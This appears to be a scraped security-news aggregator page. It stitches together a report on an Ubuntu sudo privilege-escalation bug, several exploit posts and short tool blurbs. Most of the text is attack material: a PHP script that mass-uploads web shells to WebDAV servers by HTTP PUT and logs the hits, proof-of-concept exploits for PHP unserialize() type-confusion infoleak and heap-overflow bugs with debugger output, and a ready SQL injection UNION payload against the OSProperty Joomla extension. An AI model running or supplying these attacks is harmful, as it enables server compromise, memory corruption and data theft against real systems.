Ubuntu's latest edition contains a local access escalation flaw first reported a year ago that allows users to tinker with the system clock to become a root user. The attack, reported by Linux lover Mark Smith, isn't colossally risky as it impacts only local users; those with existing access to a machine. Smith has chided Ubuntu for 'falling behind Debian'. "Congratulations, Ubuntu team. You have now fallen behind Debian's Stable Release in a security update to sudo, despite several releases in between," Smith says in a Ubuntu mailing list . "This has been fixed, fully fixed, for over a year now. Epic fail." But Canonical engineer Tyler Hicks says the bug, which allows users to access the clock without authentication, is low severity and will be fixed when version 15 is released later this year. "We will fix this issue in the next Ubuntu release (15.10) by including sudo 1.8.10 or newer," Hicks says in a "Due to the issue’s low severity and considering our practice of prioritising resources on publishing security updates that fix issues of greater security impact, we may fix this issue in stable releases of Ubuntu in the future if another sudo vulnerability of higher severity is found or if new details emerge regarding this issue." Hicks says the flaw likely does not permit privilege escalation for remote attackers. "I don't see a way for an attacker, without physical access, to use an arbitrary code execution vulnerability in combination with the issue that you've described in this bug to elevate his/her privileges," he says. Admins would instead need to gift attackers with an unlocked desktop. Smith says attackers could guess the required parameters with about five minutes of brute forcing on a relatively slow machine. ® Source

<?php /* Author: @AdeRoot\n\n"; echo " // WebDav Exploit\n\n"; if($argc == 1) { echo "Help parameter: | -h--help\n"; exit(1); } function help() { echo "Options[+]:\n\n"; echo "Dominio: | -d--dominio\n"; echo "Lista: | -l--lista\n"; echo "Thread: | -t--thread\n"; echo "File: | -f--file\n"; echo "Create: | -c--create\n\n"; echo "Single:\n\n"; echo "Usage: php webdav.php -d xxx -f xxx -c xxx\n"; echo "Example: php webdav.php -d [url]www.example.com[/url] -f /path/shell.asp -c shell.asp\n\n"; echo "Lista:\n\n"; echo "Usage: php webdav.php -l xxx -t xxx -f xxx -c xxx\n"; echo "Example: php webdav.php -l lista.txt -t 10 -f /path/shell.asp -c shell.asp\n\n"; } error_reporting(0); set_time_limit(0); $opts = getopt("hd:f:l:t:c:"); foreach(array_keys($opts) as $opt) switch($opt) { case "h": help(); break; case "d": $site = $opts["d"]; $file = $opts["f"]; $create = $opts["c"]; post($site); break; case "l": $site = array_filter(explode("\n",file_get_contents($opts["l"]))); $thread = $opts["t"]; $file = $opts["f"]; $create = $opts["c"]; thread($site,$thread,$file,$create); break; } function thread($site,$thread,$file,$create) { $out = 0; $thr = $thread; $ini = 0; $fin = $thr - 1; while(1){ $childs = array(); for ($count = $ini; $count <= $fin; $count++){ if(empty($site[$count])){ $out = 1; continue; } $pid = pcntl_fork(); if ( $pid == -1 ) { echo "Fork error\n"; exit(1); } else if ($pid) { array_push($childs, $pid); } else { post($site[$count]); exit(0); } } foreach($childs as $key => $pid){ pcntl_waitpid($pid, $status); } if($out == 1){ exit(0); } $ini = $fin + 1; $fin = $fin + $thr; } } function post($site) { global $file, $create; $filesize = filesize($file); $fp = fopen($file, "r"); if(preg_match("@http://@", $site)) { $site = $site; } else { $site = "http://".$site; } $site = $site."/".$create; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $site); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0"); curl_setopt($ch, CURLOPT_PUT, true); curl_setopt($ch, CURLOPT_INFILE, $fp); curl_setopt($ch, CURLOPT_INFILESIZE, $filesize); $exec = curl_exec($ch); echo $site."=>"; $result = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if($result == 200 || $result == 201) { echo "Created Successfully\n\n"; file_put_contents("wbshells.txt", $site."\n", FILE_APPEND); } else { echo "Failed\n\n"; } } if(isset($opts["f"]) and ($opts["c"])) { echo "End!\n\n"; } else if (!isset($opts["h"])){ echo "Option invalid or missing set more options\n\n"; } ?> Source

DAWIN Distributed Audit & Wireless Intrusion Notification DA-WIN is the end of the manual PCI wireless scan DA-WIN provides an organisation a continuous wireless scanning capability that is light touch and simple. It utilises compact and discreet sensors that can easily be deployed reducing the total cost of protection and simplifying the effort required for absolute, categoric regulatory compliance Link: Fat-Loud-Blokes-World-Of-Wierd

0d1n is a web security tool for fuzzing various HTTP payloads. It's written in C and uses libcurl. Download

# Type Confusion Infoleak Vulnerability in unserialize() with SoapFault Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1 - Release Date: 2015.4.28 > A type confusion vulnerability was discovered in unserialize() with SoapFault object's __toString() magic method that can be abused for leaking arbitrary memory blocks. Affected Versions ------------ Affected is PHP 5.6 < 5.6.8 Affected is PHP 5.5 < 5.5.24 Affected is PHP 5.4 < 5.4.40 Affected is PHP 5.3 <= 5.3.29 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` PHP_METHOD(SoapFault, __toString) { ... faultcode = zend_read_property(soap_fault_class_entry, this_ptr, "faultcode", sizeof("faultcode")-1, 1 TSRMLS_CC); faultstring = zend_read_property(soap_fault_class_entry, this_ptr, "faultstring", sizeof("faultstring")-1, 1 TSRMLS_CC); file = zend_read_property(soap_fault_class_entry, this_ptr, "file", sizeof("file")-1, 1 TSRMLS_CC); line = zend_read_property(soap_fault_class_entry, this_ptr, "line", sizeof("line")-1, 1 TSRMLS_CC); ... len = spprintf(&str, 0, "SoapFault exception: [%s] %s in %s:%ld\nStack trace:\n%s", Z_STRVAL_P(faultcode), Z_STRVAL_P(faultstring), Z_STRVAL_P(file), Z_LVAL_P(line), Z_STRLEN_P(trace) ? Z_STRVAL_P(trace) : "#0 {main}\n"); zval_ptr_dtor(&trace); RETURN_STRINGL(str, len, 0); } ``` The Z_STRVAL_P macro lead to looking up an arbitrary valid memory address, and return a string via a integer-type zval that start from this memory address. If the memory address is an invalid memory position, it should result in a crash. The Z_LVAL_P macro lead to leaking memory address via a string-type zval that this string value stored. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. ``` <?php $data = 'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"'."\0*\0".'file";i:4298447319;s:7:"'."\0*\0".'line";s:4:"ryat";}'; echo unserialize($data); ?> ``` Test the PoC on the command line, then output some memory blocks and memory address: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run test.php SoapFault exception: [UH??AWAVSPI??I??H???? in UH??AWAVAUATSH???:4307253992 ] UH??SPD???*?????t"H? Stack trace: #0 test.php(4): unserialize('O:9:"SoapFault"...') #1 {main} Process 889 exited with status = 0 (0x00000000) Source

# Type Confusion Infoleak and Heap Overflow Vulnerability in unserialize() with exception Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.3 - Release Date: 2015.4.28 > A type confusion vulnerability was discovered in exception object's __toString()/getTraceAsString() method that can be abused for leaking arbitrary memory blocks or heap overflow. Affected Versions ------------ Affected is PHP 5.6 < 5.6.8 Affected is PHP 5.5 < 5.5.24 Affected is PHP 5.4 < 5.4.40 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` ZEND_METHOD(exception, getTraceAsString) { zval *trace; char *res, **str, *s_tmp; int res_len = 0, *len = &res_len, num = 0; DEFAULT_0_PARAMS; res = estrdup(""); str = &res; trace = zend_read_property(default_exception_ce, getThis(), "trace", sizeof("trace")-1, 1 TSRMLS_CC); zend_hash_apply_with_arguments(Z_ARRVAL_P(trace) TSRMLS_CC, (apply_func_args_t)_build_trace_string, 3, str, len, &num); ... static int _build_trace_string(zval **frame TSRMLS_DC, int num_args, va_list args, zend_hash_key *hash_key) /* {{{ */ { char *s_tmp, **str; int *len, *num; long line; HashTable *ht = Z_ARRVAL_PP(frame); zval **file, **tmp; ... TRACE_APPEND_KEY("class"); TRACE_APPEND_KEY("type"); TRACE_APPEND_KEY("function"); ... #define TRACE_APPEND_KEY(key) \ if (zend_hash_find(ht, key, sizeof(key), (void**)&tmp) == SUCCESS) { \ if (Z_TYPE_PP(tmp) != IS_STRING) { \ zend_error(E_WARNING, "Value for %s is no string", key); \ TRACE_APPEND_STR("[unknown]"); \ } else { \ TRACE_APPEND_STRL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp)); \ } \ } ``` The Z_ARRVAL_P macro leads to pointing a fake ZVAL in memory via a fake HashTable and a fake Bucket. So we can supply a fake sring-type ZVAL, and lookup arbitrary memory address via the Z_STRVAL_PP macro, causing a crash or an information leak. ``` #define TRACE_APPEND_STRL(val, vallen) \ { \ int l = vallen; \ *str = (char*)erealloc(*str, *len + l + 1); \ memcpy((*str) + *len, val, l); \ *len += l; \ } ``` There is using signed integer arithmetic in erealloc(). The memcpy() function's third parameter is a unsiged integer. The vallen can be completely control and we can supply negative value via a fake string-type ZVAL. So we can assign a value to val which is larger than real allocated memory. The memcpy() will then copy more data than the heap-based buffers can hold, causing a heap-based buffer overflow. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.20. ``` <?php ini_set("memory_limit", -1); setup_memory(); $x = unserialize('O:9:"exception":1:{s:16:"'."\0".'Exception'."\0".'trace";s:'.strlen($hashtable).':"'.$hashtable.'";}'); echo $x, "\n"; function setup_memory() { global $str, $hashtable; $base = 0x114000000 + 0x20; $bucket_addr = $base; $zval_delta = 0x100; $hashtable_delta = 0x200; $zval_addr = $base + $zval_delta; $hashtable_addr = $base + $hashtable_delta; $bucket = "\x01\x00\x00\x00\x00\x00\x00\x00"; $bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00"; $bucket .= ptr2str($bucket_addr + 3*8); $bucket .= ptr2str($zval_addr); $bucket .= ptr2str(0); $bucket .= ptr2str(0); $bucket .= ptr2str(0); $bucket .= ptr2str(0); $bucket .= ptr2str(0); $bucket .= ptr2str(zhash('class')); $bucket .= "\x06\x00\x00\x00\x00\x00\x00\x00"; $bucket .= ptr2str($bucket_addr + 3*8 + 9*8); $bucket .= ptr2str($zval_addr + 5*8 + 6); $bucket .= ptr2str(0); $bucket .= ptr2str(0); $bucket .= ptr2str(0); $bucket .= ptr2str(0); $bucket .= ptr2str($zval_addr + 2*5*8 + 2*6); $bucket .= ptr2str($bucket_addr); $bucket .= ptr2str($bucket_addr + 9*8); $hashtable = "\x00\x00\x00\x00"; $hashtable .= "\x01\x00\x00\x00"; $hashtable .= "\x03\x00\x00\x00"; $hashtable .= "\x00\x00\x00\x00"; $hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00"; $hashtable .= ptr2str(0); $hashtable .= ptr2str($bucket_addr); $hashtable .= ptr2str($bucket_addr + 9*8); $hashtable .= ptr2str($bucket_addr + 18*8); $hashtable .= ptr2str(0); $hashtable .= "\x00"; $hashtable .= "\x00"; $zval = ptr2str($hashtable_addr); $zval .= ptr2str(0); $zval .= "\x00\x00\x00\x00"; $zval .= "\x04"; $zval .= "\x00"; $zval .= ptr2str(0); $zval .= ptr2str(0); $zval .= ptr2str(0); $zval .= ptr2str(0x100352572); $zval .= ptr2str(0x16); $zval .= "\x00\x00\x00\x00"; $zval .= "\x06"; $zval .= "\x00"; $zval .= ptr2str(0); $zval .= ptr2str(0); $zval .= ptr2str(0); $zval .= ptr2str(hexdec(bin2hex(strrev('class')))); $part = str_repeat("\x73", 4096); for ($j = 0; $j < strlen($bucket); $j++) { $part[$j] = $bucket[$j]; } for ($j = 0; $j < strlen($hashtable); $j++) { $part[$j + $hashtable_delta] = $hashtable[$j]; } for ($j = 0; $j < strlen($zval); $j++) { $part[$j + $zval_delta] = $zval[$j]; } $str = str_repeat($part, 1024*1024*256/4096); } function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function zhash($key) { $hash = 5381; $key = $key; $len = strlen($key) + 1; for (; $len >= 8; $len -= 8) { for ($i = 0; $i < 8; $i++) { $hash = (($hash << 5) + $hash) + ord($key{$i}); } } $key = substr($key, -$len); for ($i = 0; $i < $len; $i++) { $hash = (($hash << 5) + $hash) + ord($key{$i}); } return $hash; } ?> ``` Test the PoC on the command line, then output some memory blocks: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run tcpoc.php Process 1825 launched: '/usr/bin/php' (x86_64) exception 'Exception' in tcpoc.php:7 Stack trace: #0 [internal function]: UH??AWAVSPI??I??H????() #1 {main} Process 1825 exited with status = 0 (0x00000000) ``` Source

OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL injection in the country_id parameter of the request made to retrieve a list of states for a given country. The version was not bumped when the vulnerability was fixed, but if you download after April 27th, you downloaded a fixed version. http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html Example URL: http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31 Parameter: country_id (GET) Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31' UNION ALL SELECT NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)# -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website Source